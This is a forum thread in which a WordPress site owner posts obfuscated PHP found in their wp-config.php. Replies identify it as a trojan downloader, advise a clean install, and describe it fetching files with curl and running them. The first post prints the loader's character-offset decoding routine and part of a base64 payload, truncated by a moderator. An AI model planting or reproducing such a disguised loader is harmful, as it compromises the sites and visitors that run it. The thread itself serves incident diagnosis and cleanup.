SitePoint Sponsor

User Tag List

Results 1 to 5 of 5
  1. #1
    SitePoint Guru
    Join Date
    Nov 2000
    Posts
    741
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Found hidden WP malicious code

    I checked out my wp-config.php file and found this code at the top. Anyone know what it is or who can decode it?

    Code:
    <?php                                                          $NehPYG= array('4255','4272','4251','4262');$AhKDUwIzLXpP2hcO4nPrU0y= array('2971','2986','2973','2969','2988','2973','2967','2974','2989','2982','2971','2988','2977','2983','2982');$GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR= array('4006','4005','4023','4009','3962','3960','4003','4008','4009','4007','4019','4008','4009');$OacCikY0ctQ4XpKujTp27vMTygKKYeNWfPooZdf2xWWlbxGkg="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhT
    ..........
    yUnNiSE5QV0hCclVqQmFOVnBGVG01aFZtUnlUVVJHYUdGcmNEUlVWV2hQWWpGd2MwOVhjRnBXTTJoNlYxY3hSMkZ0UmpWVFdFSlFaREk1VEZwc1JuZFBWVTUxVFVWemFVdFRhemRKUVQwOUlpa3BPeUE9IikpOyA=";if (!function_exists("o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0")){ function o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($M9KqHq1KYdNOwDLWmEWRFlFISb4hpKj1K,$dia9SYcvCyZ){$ZbI6TeioM1pH = '';foreach($M9KqHq1KYdNOwDLWmEWRFlFISb4hpKj1K as $chiwS1E01EIQG3i5SnfUWcD1lSD){$ZbI6TeioM1pH .= chr($chiwS1E01EIQG3i5SnfUWcD1lSD - $dia9SYcvCyZ);}return $ZbI6TeioM1pH;}$EErbDZzvLO34AbJRbQal = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($NehPYG,4154);$VlQpSPGCFXX9eYD = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($AhKDUwIzLXpP2hcO4nPrU0y,2872);$mYF2SAsT99UPa6p = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR,3908);$f6E0LathXg = $VlQpSPGCFXX9eYD('$b5KWjzsbhSt1StMytIOIQKcHmc0t07zS2aFbzXcHFwyoP',$EErbDZzvLO34AbJRbQal.'('.$mYF2SAsT99UPa6p.'($b5KWjzsbhSt1StMytIOIQKcHmc0t07zS2aFbzXcHFwyoP));');$f6E0LathXg($OacCikY0ctQ4XpKujTp27vMTygKKYeNWfPooZdf2xWWlbxGkg);}?>
    Last edited by Mittineague; Jan 16, 2014 at 08:41. Reason: please do post malcode

  2. #2
    Barefoot on the Moon! silver trophy Force Flow's Avatar
    Join Date
    Jul 2003
    Location
    Northeastern USA
    Posts
    4,617
    Mentioned
    56 Post(s)
    Tagged
    1 Thread(s)
    Since the middle portion of the code has been removed, it's impossible to decode it.

    However, you correct in identifying that it should not be there.

    From what I've seen in the past, the most common code injections display alternative search results to search engine bots, such as advertising pharmacy drugs and the like.

    It likely isn't the only place where you have malicious code injected into files on your site.
    Visit The Blog | Follow On Twitter
    301tool 1.1.5 - URL redirector & shortener (PHP/MySQL)
    Can be hosted on and utilize your own domain

  3. #3
    SitePoint Addict bronze trophy
    Join Date
    Sep 2005
    Posts
    323
    Mentioned
    5 Post(s)
    Tagged
    0 Thread(s)
    The best thing would be to do a clean install. Your database could contain injected code too depending on the vulnerability used.

  4. #4
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,255
    Mentioned
    196 Post(s)
    Tagged
    2 Thread(s)
    I removed the majority of the code as we don't really need to make it any easier than it is for script-kiddies by posting something they can copy.

    Avast AV says
    Severity - High
    Status - Threat: PHP: Agent-RK [Trj]
    *Actually it seems it's a trojan downloader

    Kaspersky thread from 2006 http://forum.kaspersky.com/index.php?showtopic=21009
    Microsoft http://www.microsoft.com/security/po...n32%2fAgent.RK

  5. #5
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,255
    Mentioned
    196 Post(s)
    Tagged
    2 Thread(s)
    You're definately going to want to do more than just remove the code.

    I base64_decode'd it and best as I can tell it checks for various things then uses curl to go to source sites to download files, writes them to temp dir(s), runs them, then unlink()s the files.
    That is, you more than likely have who know's what within both your files and database. I strongly suggest you take Patche's suggestion and do a clean install and then roll back your database to the last backup before this happened.

    If you haven't read Hardening WordPress you should do so.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •